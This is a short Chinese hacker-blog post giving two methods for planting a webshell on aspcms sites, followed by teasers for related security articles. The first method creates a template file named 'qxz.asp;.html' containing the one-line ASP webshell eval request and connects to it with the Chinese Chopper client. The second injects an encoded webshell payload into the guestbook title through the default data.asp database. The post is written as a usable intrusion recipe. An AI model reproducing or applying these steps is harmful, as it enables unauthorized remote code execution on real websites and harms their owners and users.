aspcms后台拿shell的两种 ***

hacker4年前黑客文章1105

aspcms后台拿shell的两种 *** :

之一种:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写qxz.asp;.html,
在文件内容写一句话
<%eval request(“qxz”)%>
然后点击添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话:qxz.asp;.html 点这个文件就会弹出插入一句话的页面,OK然后菜刀连接。

第二种:前台留言插入一句话,这个要默认数据库才可以使用,数据库默认配置为asp.目录在/data/data.asp下

在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾

标签: 黑客技术

相关文章

AppScan是不是适用全部电脑操作系统?

AppScan是不是适用全部电脑操作系统?

什么是AppScan? AppScan在全部运用软件开发生命期中开展安全性测试,在设计阶段初期出示安全系数确保,并开展简单化单元测试卷。该专用工具能够扫描仪很多普遍的系统漏洞,比如HTTP回应切分,...

高级入侵防御系统自然环境

高级入侵防御系统自然环境

Advanced Intrusion Detection Environment 翻译中文也叫:高級入侵防御系统自然环境;   什么叫高級入侵防御系统自然环境? 高級入侵防御系统自然环境(...

SQLSERVER高级注入技巧

前言: 即是高级技巧,其它基本的注入方法就不详述了。 看不懂可查本站的注入基础文章。 为了更好的用好注入,建议大家看看本站的SQL语法相关文章 [获取全部数据库名] select name...

什么是IE秘狐漏洞?

秘狐行动:是一次瞄准美国公司的行动,与国防和金融行业有关。尚不清楚攻击组织的动机,解决这一问题的一种方式是改用其他浏览器。 2014年4月27日信息安全公司FireEye曝光了一个IE重大漏...

Stunnel应用OpenSSL库开展数据加密

Stunnel应用OpenSSL库开展数据加密

什么叫Stunnel? 此专用工具致力于做为虚拟服务器和远程控制手机客户端中间的SSL数据加密包裝。要是工程建筑全过程合乎其安全设置,Stunnel能够从FIPS 140-2认证OpenSSL FI...

XSS技术专业表述

XSS技术专业表述

先给大伙说一下XSS的技术专业表述吧!   什么叫XSS进攻? 每每程序运行的新网页页面中包括不会受到信赖的、未历经适当认证或转义的数据信息,或是应用能够建立JavaScript 的电脑浏...